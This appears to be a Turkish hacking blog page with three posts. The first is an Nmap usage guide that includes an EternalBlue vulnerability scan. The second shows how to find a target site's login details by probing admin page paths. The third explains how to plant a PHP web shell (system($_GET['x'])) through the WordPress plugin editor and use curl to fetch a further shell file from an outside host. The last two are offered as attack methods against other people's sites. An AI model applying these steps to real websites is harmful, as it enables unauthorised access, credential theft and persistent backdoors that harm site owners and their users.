NMAP PROJECT / NASIL KULLANILIR?

NMAP / KULLANIM

Nmap versiyon ve port öğrenmeyle alakalı bir Ağ Haritası(Network Mapper) programıdır. Nmap ile portları bulabilir , kullanılan sürümleri öğrenebilir ve servis isimlerini tarayabilirsiniz. Kendi içinde bulunan script özelliği sayesinde belli sürümlerdeki zafiyetleri programı kullanarak test edebilirsiniz.

NMAP KOMUTLAR

-sV = serviceVersion yani çalışan hizmetin sürümünü gösterir.

-A = OScan , işletim sistemi tahmin eder.

-F = Hızlı Taramaya yarar.

-T = T1’den T5’e kadar seviyesi vardır. Hızlandırır , pratikleştirir. T4 çok kullanılır.

-sS = Gizli tarama yapar.

Benim açık portları ve sürümleri , bilgilerini öğrenmek için kullandığım kod ;

nmap -sV -sS -n -T4 ip.ad.re.si şeklindedir.

NMAP ile eternalblue exploit açığının olup olmadığını tespit etmek için ;

nmap -p445 --script smb-vuln-ms17-010 <ip> şeklinde bir tarama yapmak gerekir.

Bunun gibi zafiyeti tespit edebileceğiniz bir çok script içinde barındırılmaktadır.

Nmap resmi websitesi :https://nmap.org/

Read More

Admin Panel'den Giriş Bilgilerini Ele Geçirme

Admin Panel'den Giriş Bilgilerini Ele Geçirme

Merhaba arkadaşlar bugün sizlere

admin panel kaynak kodlarından sitenin giriş bilgilerini almayı göstereceğim

gördüğünüz gibi admin panelimiz şimdi ctrl+u ile kaynak kodlarına gidelim

şimdi kaynak kodlarında url üzerinden denemeler yapıyoruz admin.php - home.php -dashboard.php gibi amacımız eğer şifreyi girseydik bizi hangi sayfaya atacağını bulmak

gördüğünüz gibi doğru olanı bulduk şimdi biraz kurcalıyoruz

evet user diye aradık ve manage_user.php bulduk bu bizim işimize yarabilir o zaman oraya gidelim

evet bu sayfayıda kurcaladık ve bulduk add_user.php?id=1 bu site içinde user ekleme editleme bölümü şimdi bide oraya gidelim 

ve biraz kurcalayınca değerleri bulduk gördüğünüz gibi bu kadar kolay

bu aşama işi arkadaşlar her sitede çalışmaz ama denemek lazım hedef sitede işinize yarar

Read More

WORDPRESS KOMUT SHELL UPLOAD [METHOD]

WORDPRESS KOMUT SHELL UPLOAD [METHOD]

Merhaba Arkadaşlar Bugün  Sizlere  Wordpress Sitelerde Komut Çalıştırmayı Anlatacağım Konuyu Yabancı Bir Kaynaktan Çevirerek Sizlere Sunuyoruz!

İlk Önce Wordpress Yönetici Paneline Girerek Plugin Editor Bölümüne Geliyoruz.

Editor'e Geldikten Sonra Herhangi Bir Plugin'i Seçiniz Seçtikten Sonra URL Şu Şekilde Olacaktır.

/wp-admin/plugin-editor.php?file=akismet/index.php

[Önemli]

Şimdi İse Editleyecegiz Yapmanız Gereken Tek Şey Size Vereceğim Aşağıdaki Komut'u Yapıştırmak Olacaktır.

<pre><?php system($_GET['x'])?></pre>

[ÖRNEK]

öreksitecom/wp-content/plugins/akismet/?x=

Bu Şekilde Konsol Çalıştırabilirsiniz Burdan Shellde Yükleyebilmeniz Mümkündür ve
Genelde nginx Serverlerde Çalışan Bir Yöntemdir.

[ÖRNEK]

öreksitecom/wp-content/plugins/akismet/?x=dir ​

[dir/ls] Komutlarını Kullanarak Deneyebilirsiniz Çalışıp Çalışmadıgını Size Dizin İçerisindeki Klasör ve Dosyaları Gösterir.

Gördügünüz Gibi Gayet Pratik Bir Yöntem

curl shellyüküsitecom/shell.txt -o zymper.php şeklinde komut çalıştırdığınızda zymper.php isminde shellyüküsitecom/shell.txt sitesindeki shellin yüklü olduğu bir dosya size verecektir​

Read More